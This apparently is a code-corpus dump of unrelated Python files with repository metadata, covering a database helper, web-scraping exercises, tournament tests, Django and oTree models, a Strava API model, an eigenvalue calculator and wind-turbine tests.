def search_id(self, args):
""" Make a search on one field then return PK_id
Keyword arguments:
args -- tuple
(
field -- str name of database field
value -- str || list
)
"""
request = {
'fields': 'PK_id',
'where': [
args,
]
}
table = str(self.table)
format_fields = dict(self.format_fields)
rep = DB.search(format_fields, table, request, True, self.__class__)
if rep:
return rep.PK_id
return False
def get_list(self, fields, request):
""" Return a dict with key:value
Keyword arguments:
fields -- tuple for dict key value
request -- tuple search request conditions
"""
query = self.search_by(request)
rep = []
key, value = fields
for el in query:
rep.append((el.__getattribute__(key),el.__getattribute__(value)))
return rep
def delete(self, request):
""" delete element from data base """
table = str(self.table)
DB.delete(table, request) | [
"yohan.solon@gmail.com"
] | yohan.solon@gmail.com |
0ff42ffdcd69c859b093f5e2f320ba03debf77c8 | fea9e7fc8b5ae1752a8917f415ddfcadc62ae540 | /practice/week2/css-selector/sel_books.py | 9e571bd96e24c0ce80be33267c1c92621b9eed3f | [] | no_license | Dadajon/dl-with-big-data | fc85e0dd13aa857b89c9b707faabcfc69b51fe24 | 8e7b543948be0773550a114dc6467627c88e445f | refs/heads/main | 2023-07-26T05:43:02.901241 | 2021-09-09T06:09:43 | 2021-09-09T06:09:43 | 328,919,918 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | from bs4 import BeautifulSoup
fp = open("books.html", encoding='utf-8')
soup = BeautifulSoup(fp, 'html.parser')
sel = lambda q: print(soup.select_one(q).string)
sel("#nu") # id로 찾는 방법
sel("li#nu") # id와 tag로 찾는 방법
sel("ul > li#nu") # 부모 tag로 id와 tag로 찾는 방법
sel("#bible #nu") # id로 아래의 id를 찾는 방법
sel("#bible > #nu") # id 끼리 부모자식 관계를 나타낸것
sel("ul#bible > li#nu") #
sel("li[id='nu']")
sel("li:nth-of-type(4)")
print(soup.select("li")[3].string)
print(soup.find_all("li")[3].string) | [
"dadajonjurakuziev@gmail.com"
] | dadajonjurakuziev@gmail.com |
41da231ac8b5c5b4173b3d7a9391a341557523f9 | 8acc783c61f86bbcb75fb884db3986e47a78d228 | /fullstack-nanodegree-vm/vagrant/tournament/tournament_test.py | ab5e58c336b0a5a489297e9b0f1935c3db9e14fb | [] | no_license | barefootlance/udacity-fullstack-p3 | 9469c0f09dd8dce5f99a6071a22c55aee838a59f | 1f24fde32951b18ae9e92ccb0b04c720c704546a | refs/heads/master | 2016-08-08T06:37:44.689146 | 2015-09-16T17:23:57 | 2015-09-16T17:23:57 | 40,791,337 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,695 | py | #!/usr/bin/env python
#
# Test cases for tournament.py
from tournament import *
def testDeleteMatches():
deleteMatches()
print "1. Old matches can be deleted."
def testDelete():
deleteMatches()
deletePlayers()
print "2. Player records can be deleted."
def testCount():
deleteMatches()
deletePlayers()
c = countPlayers()
if c == '0':
raise TypeError(
"countPlayers() should return numeric zero, not string '0'.")
if c != 0:
raise ValueError("After deleting, countPlayers should return zero.")
print "3. After deleting, countPlayers() returns zero."
def testRegister():
deleteMatches()
deletePlayers()
registerPlayer("Chandra Nalaar")
c = countPlayers()
if c != 1:
raise ValueError(
"After one player registers, countPlayers() should be 1.")
print "4. After registering a player, countPlayers() returns 1."
def testRegisterCountDelete():
deleteMatches()
deletePlayers()
registerPlayer("Markov Chaney")
registerPlayer("Joe Malik")
registerPlayer("Mao Tsu-hsi")
registerPlayer("Atlanta Hope")
c = countPlayers()
if c != 4:
raise ValueError(
"After registering four players, countPlayers should be 4.")
deletePlayers()
c = countPlayers()
if c != 0:
raise ValueError("After deleting, countPlayers should return zero.")
print "5. Players can be registered and deleted."
def testStandingsBeforeMatches():
deleteMatches()
deletePlayers()
registerPlayer("Melpomene Murray")
registerPlayer("Randy Schwartz")
standings = playerStandings()
if len(standings) < 2:
raise ValueError("Players should appear in playerStandings even before "
"they have played any matches.")
elif len(standings) > 2:
raise ValueError("Only registered players should appear in standings.")
if len(standings[0]) != 5:
raise ValueError("Each playerStandings row should have five columns.")
[(id1, name1, wins1, matches1, byes1), (id2, name2, wins2, matches2, byes2)] = standings
if matches1 != 0 or matches2 != 0 or wins1 != 0 or wins2 != 0:
raise ValueError(
"Newly registered players should have no matches or wins.")
if set([name1, name2]) != set(["Melpomene Murray", "Randy Schwartz"]):
raise ValueError("Registered players' names should appear in standings, "
"even if they have no matches played.")
print "6. Newly registered players appear in the standings with no matches."
def testReportMatches():
deleteMatches()
deletePlayers()
registerPlayer("Bruno Walton")
registerPlayer("Boots O'Neal")
registerPlayer("Cathy Burton")
registerPlayer("Diane Grant")
standings = playerStandings()
[id1, id2, id3, id4] = [row[0] for row in standings]
reportMatch(id1, id2)
reportMatch(id3, id4)
standings = playerStandings()
for (i, n, w, m, b) in standings:
if m != 1:
raise ValueError("Each player should have one match recorded.")
if i in (id1, id3) and w != 1:
raise ValueError("Each match winner should have one win recorded.")
elif i in (id2, id4) and w != 0:
raise ValueError("Each match loser should have zero wins recorded.")
if b != 0:
raise ValueError("Each player should have zero byes when there are an even number of players.")
print "7. After a match, players have updated standings."
def testPairings():
deleteMatches()
deletePlayers()
registerPlayer("Twilight Sparkle")
registerPlayer("Fluttershy")
registerPlayer("Applejack")
registerPlayer("Pinkie Pie")
standings = playerStandings()
[id1, id2, id3, id4] = [row[0] for row in standings]
reportMatch(id1, id2)
reportMatch(id3, id4)
pairings = swissPairings()
if len(pairings) != 2:
raise ValueError(
"For four players, swissPairings should return two pairs.")
[(pid1, pname1, pid2, pname2), (pid3, pname3, pid4, pname4)] = pairings
correct_pairs = set([frozenset([id1, id3]), frozenset([id2, id4])])
actual_pairs = set([frozenset([pid1, pid2]), frozenset([pid3, pid4])])
if correct_pairs != actual_pairs:
raise ValueError(
"After one match, players with one win should be paired.")
print "8. After one match, players with one win are paired."
def testBye():
deleteMatches()
deletePlayers()
registerPlayer("Twilight Sparkle")
registerPlayer("Fluttershy")
registerPlayer("Harvey Wallbanger")
standings = playerStandings()
print standings
print swissPairings()
[id1, id2, id3, id4] = [row[0] for row in standings]
reportMatch(id1, None)
print playerStandings()
def testOddPairings():
from collections import Counter
deleteMatches()
deletePlayers()
registerPlayer("Twilight Sparkle")
registerPlayer("Fluttershy")
registerPlayer("Harvey Wallbanger")
standings = playerStandings()
byes = Counter()
for row in standings:
byes[row[0]] = 0
numRounds = 4
for round in xrange(numRounds):
pairings = swissPairings()
if len(pairings) != 2:
raise ValueError(
"For three players, swissPairings should return two pairs.")
id1 = pairings[0][0]
id2 = pairings[0][2]
id3 = pairings[1][0]
id4 = pairings[1][2]
if id1 == None:
byes[id2] += 1
elif id2 == None:
byes[id1] += 1
elif id3 == None:
byes[id4] += 1
elif id4 == None:
byes[id3] += 1
else:
raise ValueError(
"For three players, there should be exactly one bye in round #{Round}.".format(Round=round))
items = byes.items()
minByes = min(items, key=lambda x: x[1])
maxByes = max(items, key=lambda x: x[1])
if maxByes[1] - minByes[1] > 1:
raise ValueError(
"In round #{Round}, no player should ever have more than one bye than any other player ({Min}, {Max})".format(Round=round, Min=minByes, Max=maxByes))
reportMatch(id1, id2)
reportMatch(id3, id4)
print "9. For {Rounds} rounds, every round has exactly one bye and no player has more than one bye than any other.".format(Rounds=numRounds)
if __name__ == '__main__':
testDeleteMatches()
testDelete()
testCount()
testRegister()
testRegisterCountDelete()
testStandingsBeforeMatches()
testReportMatches()
testPairings()
testOddPairings()
print "Success! All tests pass!"
| [
"barefootlance@gmail.com"
] | barefootlance@gmail.com |
301266cf55d4b1db72d4c34ecfe1d5c9ba8e4fbf | 27404582c847efaf9a6e19d0fa6300e387a21a1a | /spriters-resource.com/crawler.py | 9099e48c7389a96d7fe9440e2b9260a7da07e0e6 | [] | no_license | Necrno/Misc-Download-Scripts | 72a6fad8c18b621894181e94961769eaf5889987 | 8a975c4d6ed33851cc2ca842645573caff6b4a6d | refs/heads/master | 2021-05-04T12:18:54.563041 | 2017-12-27T00:10:09 | 2017-12-27T00:10:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,243 | py | import requests
import bs4
import os
headers = {
'User-Agent': "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
}
URL = "https://www.spriters-resource.com"
def get_consoles():
consoles = []
response = requests.get(URL)
soup = bs4.BeautifulSoup(response.text, "html.parser")
for console in soup.find(id="leftnav-consoles"):
if type(console) == bs4.element.Tag and console.get("href") is not None:
consoles.append((console.text, URL + console.get("href")))
return consoles
def get_games(console, letter):
games = []
print(console[0] + " - " + letter)
print(console[1] + letter + ".html")
response = requests.get(console[1] + letter + ".html")
soup = bs4.BeautifulSoup(response.text, "html.parser")
for link in soup.find_all("a"):
for child in link.findChildren():
if child.get("class") is not None and child.get("class") == ['gameiconcontainer']:
game_name = child.find("div").find("span").string
games.append((game_name, URL + link.get("href")))
return games
def get_sheets(game):
sheets = []
response = requests.get(game[1])
soup = bs4.BeautifulSoup(response.text, "html.parser")
for link in soup.find_all("a"):
for div in link.find_all("div"):
if div.get("class") == ["iconcontainer"]:
sheet_url = div.find("div", attrs={"class": "iconbody"}).find("img").get("src").replace("sheet_icons",
"sheets")
sheet_name = div.find("div").find("span").string
sheets.append((sheet_name, URL + sheet_url))
return sheets
file = open("links.txt", "w")
for console in get_consoles():
for letter in "0ABCDEFGHIJKLMNOPQRSTUVWXYZ":
for game in get_games(console, letter):
for sheet in get_sheets(game):
extension = os.path.splitext(sheet[1])[1]
file.write(console[0] + os.sep + game[0] + os.sep + sheet[0] + extension + "\0" + sheet[1] + "\n")
file.close() | [
"Anise5-humid5-Allow-5Lulu-Honk"
] | Anise5-humid5-Allow-5Lulu-Honk |
afde11cf35e41b50a17e141a35f38faa365d9ba6 | 84cc9b9b6af95b81d19eda1020f1ac97cbbfa42f | /myapp/models.py | 65909fb3ef615af0b1bebed8ba3bfb36a11f9121 | [] | no_license | YouCantTouchThis/IncognitoFIN | b91caff1b8e991263ba6c19869374f9e84ab8f48 | d99065285216bc731f6339ab9b15b1decaba1c70 | refs/heads/master | 2022-12-02T00:18:10.276649 | 2020-07-26T01:48:55 | 2020-07-26T01:48:55 | 282,555,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | from django.db import models
# Create your models here.
class Diagnosis(models.Model):
image = models.ImageField(upload_to = 'images/')
email = models.EmailField()
| [
"noreply@github.com"
] | YouCantTouchThis.noreply@github.com |
4dd2952b692d1eb7f9535151212982a8483654d6 | 0bf183f870d39037a254695b163c833512a826f8 | /wapps/migrations/0016_auto_20161024_0925.py | 5799f374b78a09d39052c63d158a41562f899572 | [
"MIT"
] | permissive | apihackers/wapps | 47c57a762aec89bc398a152763a2b26005d8ffdc | e8158747aa3d77246d41142580faf9a5f2b0d968 | refs/heads/master | 2022-06-19T19:40:28.615502 | 2018-05-02T12:42:51 | 2018-05-02T12:42:51 | 59,942,417 | 7 | 2 | MIT | 2022-05-21T21:45:25 | 2016-05-29T12:40:01 | Python | UTF-8 | Python | false | false | 723 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-24 09:25
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
from wapps.utils import get_image_model
class Migration(migrations.Migration):
dependencies = [
('wapps', '0015_identitysettings_amp_logo'),
]
operations = [
migrations.AlterField(
model_name='identitysettings',
name='amp_logo',
field=models.ForeignKey(blank=True, help_text='An mobile optimized logo that must be 600x60', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=get_image_model(), verbose_name='Mobile Logo'),
),
]
| [
"noirbizarre@gmail.com"
] | noirbizarre@gmail.com |
12a314df473b007e01fcd646a5de9d22189aca4b | 9b7d1472086eed304320312043a95610a39baf9c | /easy_maps/migrations/0001_initial.py | 63a5e3ffb746437d92af2bbe813d7a74e7c6e4bc | [
"MIT"
] | permissive | duct-tape/django-easy-maps | 1831785952c5ef40028197d5ab618074b5a6053a | 790196fcb5652a76a64f7f513c4c4ef4a1c905df | refs/heads/master | 2020-05-28T05:14:18.312914 | 2019-04-21T04:40:29 | 2019-04-21T04:40:29 | 188,890,561 | 0 | 0 | MIT | 2019-05-27T18:20:17 | 2019-05-27T18:20:16 | null | UTF-8 | Python | false | false | 1,103 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Address',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('address', models.CharField(unique=True, max_length=255, verbose_name='address')),
('computed_address', models.CharField(max_length=255, null=True, verbose_name='computed address', blank=True)),
('latitude', models.FloatField(null=True, verbose_name='latitude', blank=True)),
('longitude', models.FloatField(null=True, verbose_name='longitude', blank=True)),
('geocode_error', models.BooleanField(default=False, verbose_name='geocode error')),
],
options={
'verbose_name': 'EasyMaps Address',
'verbose_name_plural': 'Address Geocoding Cache',
},
),
]
| [
"basil.shubin@gmail.com"
] | basil.shubin@gmail.com |
7016256f526c1ff9c4e319eff1a5613547d7df02 | 9df188d04d764638794c0a74128b1f4860a255c6 | /cspp1-practice/m9/Functions and Objects Exercise-1/Functions and Objects Exercise-1/functions_and_objects_1.py | 66d30945ad0302702084cbb8a9b43bb0de7e6376 | [] | no_license | shanmukhsurendra/CSPP1 | 815742f60de9c0374c4dcd21d9f7eb7fe30d6428 | 310be6b98c003b7f1b7c7d6e1269d18e0cef91ab | refs/heads/master | 2020-03-24T17:50:46.811931 | 2018-08-25T07:57:36 | 2018-08-25T07:57:36 | 142,873,589 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 412 | py | #Exercise : Function and Objects Exercise-1
#Implement a function that converts the given testList = [1, -4, 8, -9] into [1, 4, 8, 9]
def apply_to_each(L, f):
j =0
for i in range(len(L)):
L[i] = f(L[i])
print(L)
def main():
data = input()
data = data.split()
list1 = []
for j in data:
list1.append(int(j))
apply_to_each(list1, abs)
if __name__ == "__main__":
main()
| [
"shanmukhsurendra@msitprogram.net"
] | shanmukhsurendra@msitprogram.net |
9ad7c88df6556a4c4f1d9aae267e3ee7998f964e | a0f8603ef5bd2c53e2efa2aaee69d37361376ac2 | /setup.py | c14b8b2cef5641749d683e19fb44f395cdd0a569 | [
"MIT"
] | permissive | ProjetPP/PPP-NaturalMath | 383dbc28f2769c020b000676afd8b7a0efb0564c | ce51865d890cb20eba78d73a362af1cb2b62002b | refs/heads/master | 2021-01-25T06:40:01.565488 | 2015-11-21T13:29:21 | 2015-11-21T13:29:21 | 29,428,678 | 2 | 1 | null | 2015-05-16T06:34:25 | 2015-01-18T14:35:50 | Python | UTF-8 | Python | false | false | 1,110 | py | #!/usr/bin/env python3
from setuptools import setup, find_packages
setup(
name='ppp_natural_math',
version='0.3',
description='Natural language processing for math questions for the Projet Pensées\nProfondes.',
url='https://github.com/ProjetPP',
author='Valentin Lorentz',
author_email='valentin.lorentz+ppp@ens-lyon.org',
license='MIT',
classifiers=[
'Environment :: No Input/Output (Daemon)',
'Development Status :: 1 - Planning',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP :: WSGI :: Application',
'Topic :: Software Development :: Libraries',
],
install_requires=[
'ply',
'ppp_datamodel>=0.6',
'ppp_libmodule>=0.7',
],
packages=[
'ppp_natural_math',
],
)
| [
"progval@progval.net"
] | progval@progval.net |
49731a56a1cd6079a7c5e954a58e7180a399da0b | a1f47b53c2583ab94ce80431ace4ea2090142a25 | /preference_discovery/models.py | 51d89bbc8010a4543b23e01c52cbffc15f6221e2 | [
"MIT"
] | permissive | sanjiw/oTree | 0b30f6dee8b93e2eefef18d16128be5eb2a7d13b | d60ea92a1a2be3f8b650c5e1547a27a730671333 | refs/heads/master | 2023-06-06T20:37:58.462732 | 2021-07-18T14:24:39 | 2021-07-18T14:24:39 | 386,983,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,065 | py | from otree.api import (
models,
widgets,
BaseConstants,
BaseSubsession,
BaseGroup,
BasePlayer,
Currency as c,
currency_range,
)
import numpy as np
import pandas as pd
from random import sample
author = 'Putu Sanjiwacika Wibisana'
doc = """
Adaptation of Preference Discovery by Delaney, Jacobson and Moenig (2018) for risk preference discovery.
"""
class Constants(BaseConstants):
name_in_url = 'preference_discovery_v2'
players_per_group = None
num_rounds = 20
with open('preference_discovery/Lottery.csv', encoding="utf-8") as file:
prospects = pd.read_csv(file)
class Subsession(BaseSubsession):
pass
class Group(BaseGroup):
pass
class Player(BasePlayer):
def set_player_param(self):
# round settings
self.training_round = 1 if self.round_number <= self.session.config["training_rounds"] else 0
if self.round_number == 1:
self.participant.vars["prospect_table"] = Constants.prospects
self.endowment = self.session.config["endowment"]
self.participant.vars["payoff_vector"] = list()
elif self.round_number == self.session.config["training_rounds"] + 1:
self.participant.vars["prospect_table"] = Constants.prospects
#randomizer
rand = sample(list(range(0,20)),4)
rand.append(20)
self.participant.vars["random_indexes"] = rand
self.participant.vars["displayed_lotteries"] = list(self.participant.vars["prospect_table"].loc[self.participant.vars["random_indexes"],"Index"])
self.participant.vars["displayed_prospects"] = self.participant.vars["prospect_table"].loc[self.participant.vars["random_indexes"],:]
self.displayed_lotteries = str(list(self.participant.vars["displayed_lotteries"]))
def payoff_realizer(self):
df = self.participant.vars["displayed_prospects"]
df[["Allocation"]] = [self.Lotere_A, self.Lotere_B, self.Lotere_C, self.Lotere_D, self.Lotere_E] ### df[["Allocation"]] = [0,0,2,1,2]
df[["payoff"]] = [0, 0, 0, 0, 0]
for i in self.participant.vars["random_indexes"]:
df.loc[i,"A_or_B"] = np.random.choice(["A","B"], p=[df.loc[i,"p1"],df.loc[i,"p2"]])
df.loc[i,"payoff"] = df.loc[i,"x1"] * df.loc[i,"Allocation"] if df.loc[i,"A_or_B"] == "A" else df.loc[i,"x2"] * df.loc[i,"Allocation"]
self.payoff_thisround = int(df[["payoff"]].sum())
if self.training_round == False:
self.participant.vars["payoff_vector"].append(self.payoff_thisround)
self.participant.vars["prospect_table"].update(df)
for i in range(0,len(self.participant.vars["prospect_table"])):
if self.participant.vars["prospect_table"].loc[i,"A_or_B"] != "X":
if self.participant.vars["prospect_table"].loc[i,"A_or_B"] == "A":
self.participant.vars["prospect_table"].loc[i, "p1"] = 1
self.participant.vars["prospect_table"].loc[i, "p2"] = 0
elif self.participant.vars["prospect_table"].loc[i,"A_or_B"] == "B":
self.participant.vars["prospect_table"].loc[i, "p1"] = 0
self.participant.vars["prospect_table"].loc[i, "p2"] = 1
else:
pass
self.participant.vars["displayed_prospects"] = df
endowment = models.IntegerField()
payoff_thisround = models.IntegerField()
displayed_lotteries = models.StringField()
training_round = models.BooleanField()
Lotere_A = models.IntegerField(min=0, max=10, initial=0)
Lotere_B = models.IntegerField(min=0, max=10, initial=0)
Lotere_C = models.IntegerField(min=0, max=10, initial=0)
Lotere_D = models.IntegerField(min=0, max=10, initial=0)
Lotere_E = models.IntegerField(min=0, max=10, initial=0)
## Vars for questionnaire
Name = models.StringField(label="Nama Lengkap Anda:")
Age = models.IntegerField(label="Usia:", min=14, max=35)
Gender = models.StringField(label="Gender:", choices=["Pria", "Wanita"])
| [
"sanji.wibisana@gmail.com"
] | sanji.wibisana@gmail.com |
b9bcaa542c31817b3e4ff6a55070e5d1260e7a32 | a424323a34a2fc5700d690829752d3e30032a1e6 | /routelanta/swagger_client/models/error.py | dd84e74804f597df3a67e64cff493499f31707de | [] | no_license | jackrager/jackrager.github.io | 884747803fa44063372efdbf46e36e979474d2fe | 50b9b62ca7a7fae6744796c1aa032f16cfad5898 | refs/heads/master | 2023-03-09T22:08:53.059755 | 2023-02-20T22:30:23 | 2023-02-20T22:30:23 | 228,740,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,230 | py | # coding: utf-8
"""
Strava API v3
The [Swagger Playground](https://developers.strava.com/playground) is the easiest way to familiarize yourself with the Strava API by submitting HTTP requests and observing the responses before you write any client code. It will show what a response will look like with different endpoints depending on the authorization scope you receive from your athletes. To use the Playground, go to https://www.strava.com/settings/api and change your “Authorization Callback Domain” to developers.strava.com. Please note, we only support Swagger 2.0. There is a known issue where you can only select one scope at a time. For more information, please check the section “client code” at https://developers.strava.com/docs. # noqa: E501
OpenAPI spec version: 3.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Error(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'code': 'str',
'field': 'str',
'resource': 'str'
}
attribute_map = {
'code': 'code',
'field': 'field',
'resource': 'resource'
}
def __init__(self, code=None, field=None, resource=None): # noqa: E501
"""Error - a model defined in Swagger""" # noqa: E501
self._code = None
self._field = None
self._resource = None
self.discriminator = None
if code is not None:
self.code = code
if field is not None:
self.field = field
if resource is not None:
self.resource = resource
@property
def code(self):
"""Gets the code of this Error. # noqa: E501
The code associated with this error. # noqa: E501
:return: The code of this Error. # noqa: E501
:rtype: str
"""
return self._code
@code.setter
def code(self, code):
"""Sets the code of this Error.
The code associated with this error. # noqa: E501
:param code: The code of this Error. # noqa: E501
:type: str
"""
self._code = code
@property
def field(self):
"""Gets the field of this Error. # noqa: E501
The specific field or aspect of the resource associated with this error. # noqa: E501
:return: The field of this Error. # noqa: E501
:rtype: str
"""
return self._field
@field.setter
def field(self, field):
"""Sets the field of this Error.
The specific field or aspect of the resource associated with this error. # noqa: E501
:param field: The field of this Error. # noqa: E501
:type: str
"""
self._field = field
@property
def resource(self):
"""Gets the resource of this Error. # noqa: E501
The type of resource associated with this error. # noqa: E501
:return: The resource of this Error. # noqa: E501
:rtype: str
"""
return self._resource
@resource.setter
def resource(self, resource):
"""Sets the resource of this Error.
The type of resource associated with this error. # noqa: E501
:param resource: The resource of this Error. # noqa: E501
:type: str
"""
self._resource = resource
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Error, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Error):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"noreply@github.com"
] | jackrager.noreply@github.com |
063b6bc5559dd6534df902d9ab972ce7ecf6bd79 | 805d9859e85321e6b0a87b3f6fd4b2bf765bc8ee | /Python/Dictionary.py | 4c616f7850fd469d2516169036298cc35e03ce79 | [] | no_license | aaka2409/HacktoberFest2020 | eb6b312555b046b6382cee106b7869d5a36cfe9d | f348e60c2c58c99c20207094b8351aa15b319285 | refs/heads/master | 2023-08-26T01:19:49.058021 | 2021-10-25T09:48:24 | 2021-10-25T09:48:24 | 420,963,776 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 604 | py | #Dictionary
#beginner
pydic = {
"apple" : "a fruit, usually green or red in color. The one Eve ate.",
"lebanon" : "the place that got blasted a few weeks ago.",
"pandemic" : "a new word nigerian youths learnt because of corona virus",
"ncdc" : "a governemental parastatal we just heard about, as per covid.",
"nddc" : "a governemtal parastatal that has been embezzling since the ages.",
}
print('Welcome to PyDic')
keyword = input('Enter Word to be searched: ')
print('Searching..........')
if keyword in pydic:
print(pydic[keyword])
else:
print('Sorry. Word not in pyDic') | [
"ayfolut@gmail.com"
] | ayfolut@gmail.com |
ee0efe58c5e34175fd2e94f5aa392806a29802d3 | 3d1b3826fba898f738d2cd4345275d8f3536429d | /eigen_value_calculator_3x3.py | 263c44bc5b8606e4440e138ccd81bb1795064cbc | [] | no_license | rushil180101/eigen-value-calculator-script | 8f45a4ac660e8822ec84f46a53e841adc1b8edfa | 7700e3b79d1ecbd0fd99a27b476b96397a0d3909 | refs/heads/main | 2023-08-15T10:04:01.404297 | 2021-10-11T10:43:45 | 2021-10-11T10:43:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,707 | py | # Eigen Values Calculator
import math
A = []
print('Enter the values of 3x3 matrix')
# Input the matrix values.
for i in range(3):
row = []
for j in range(3):
row.append(int(input()))
A.append(row)
# Print the matrix for better visualization.
print('\n Matrix')
for i in range(len(A)):
for j in range(len(A[i])):
print('%4d' % (A[i][j]), end=' ')
print()
# Sum of diagonal elements.
s1 = A[0][0] + A[1][1] + A[2][2]
# Sum of diagonal minors.
s2 = (A[1][1]*A[2][2] - A[1][2]*A[2][1]) + \
(A[0][0]*A[2][2] - A[0][2]*A[2][0]) + \
(A[0][0]*A[1][1] - A[0][1]*A[1][0])
# Determinant of matrix.
determinant = (A[0][0]*(A[1][1]*A[2][2] - A[1][2]*A[2][1])) - \
(A[0][1]*(A[1][0]*A[2][2] - A[1][2]*A[2][0])) + \
(A[0][2]*(A[1][0]*A[2][1] - A[1][1]*A[2][0]))
# Characteristic Equation.
equation = '(lambda^3) - (' + str(s1) + ')*(lambda^2) + (' + \
str(s2) + ')*(lambda) - (' + str(determinant) + ') = 0'
print('\nCharacteristic Equation : ', equation)
# Find the roots of cubic equation, which are ultimately the eigen values.
if determinant == 0:
# If determinant is 0 then one root is 0 and we find other two roots.
roots = [0]
try:
a = 1
b = -s1
c = s2
root2 = (-b + math.sqrt(b * b - 4 * a * c)) / (2 * a)
root3 = (-b - math.sqrt(b * b - 4 * a * c)) / (2 * a)
roots.extend([root2, root3])
except Exception as e:
print('Eigen Values do not exist or are not real numbers.')
exit(0)
else:
try:
# Find the factors of determinant.
x = [i for i in range(1, abs(determinant)+1) if determinant % i == 0]
# Also include negative values of the factors.
# For example, if the factors are [1, 2, 3]
# then also include [-1, -2, -3] to form [1, 2, 3, -1, -2, -3].
x.extend([-i for i in x])
roots = []
for lambda_ in x:
eqn = math.pow(lambda_, 3) - s1*math.pow(lambda_, 2) + s2*lambda_ \
- determinant
if eqn == 0.00:
roots.append(lambda_)
# If there is at least one root, then calculate other two roots.
if len(roots) < 3:
root1 = roots[0]
c = determinant/root1
a = 1
b = (s2 - c)/-root1
root2 = (-b + math.sqrt(b * b - 4 * a * c)) / (2*a)
root3 = (-b - math.sqrt(b * b - 4 * a * c)) / (2*a)
roots = [root1, root2, root3]
except Exception as e:
print('Eigen Values do not exist or are not real numbers.')
exit(0)
eigen_values = roots
print('\nEigen Values of the given matrix are : ', eigen_values)
| [
"rushil180101@gmail.com"
] | rushil180101@gmail.com |
64ccdd263ca98e95b24a5cf753dcf440d430245d | 10e1a046d2fb02d0742364c5d2ca3a40f9380416 | /py_wake/tests/test_windturbines/test_generic_wind_turbines.py | 0dec1eb35265b6ee19a256e891ed3db51e58c090 | [
"MIT"
] | permissive | Bowen-Du/PyWake | e1c407d4ff20101c95c28cd856faec729b414320 | 9a3c9a85f50082da01286b2dc8551a4e8f5fc037 | refs/heads/master | 2023-06-10T20:36:00.213649 | 2021-07-02T11:43:51 | 2021-07-02T13:14:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,371 | py | from py_wake.examples.data.hornsrev1 import V80, Hornsrev1Site
from py_wake.wind_turbines._wind_turbines import WindTurbine
from py_wake.wind_turbines.generic_wind_turbines import GenericWindTurbine, GenericTIRhoWindTurbine
from py_wake.examples.data import wtg_path
from py_wake.examples.data.dtu10mw import DTU10MW
import numpy as np
import matplotlib.pyplot as plt
from py_wake.tests import npt
import pytest
from py_wake.deficit_models.noj import NOJ
from py_wake.site.xrsite import XRSite
def test_GenericWindTurbine():
    """GenericWindTurbine must reproduce the power/ct curves of three known
    reference turbines (V80, Vestas V112 from WAsP wtg, DTU10MW) within
    per-turbine absolute tolerances."""
    # (reference turbine, turbulence intensity, power tolerance, ct tolerance)
    for ref, ti, p_tol, ct_tol in [(V80(), .1, 0.03, .16),
                                   (WindTurbine.from_WAsP_wtg(wtg_path + "Vestas V112-3.0 MW.wtg"), .05, 0.035, .07),
                                   (DTU10MW(), .05, 0.06, .13)]:
        # Rated power taken as the max over 10-19 m/s of the reference curve.
        power_norm = ref.power(np.arange(10, 20)).max()
        wt = GenericWindTurbine('Generic', ref.diameter(), ref.hub_height(), power_norm / 1e3,
                                turbulence_intensity=ti, ws_cutin=None)
        if 0:  # debug plot, disabled
            u = np.arange(0, 30, .1)
            p, ct = wt.power_ct(u)
            plt.plot(u, p / 1e6, label='Generic')
            plt.plot(u, ref.power(u) / 1e6, label=ref.name())
            plt.ylabel('Power [MW]')
            plt.legend()
            ax = plt.twinx()
            ax.plot(u, ct, '--')
            ax.plot(u, ref.ct(u), '--')
            plt.ylabel('Ct')
            plt.show()
        # Compare only over the operating range 5-24 m/s.
        u = np.arange(5, 25)
        p, ct = wt.power_ct(u)
        p_ref, ct_ref = ref.power_ct(u)
        # print(np.abs(p_ref - p).max() / power_norm)
        npt.assert_allclose(p, p_ref, atol=power_norm * p_tol)
        # print(np.abs(ct_ref - ct).max())
        npt.assert_allclose(ct, ct_ref, atol=ct_tol)
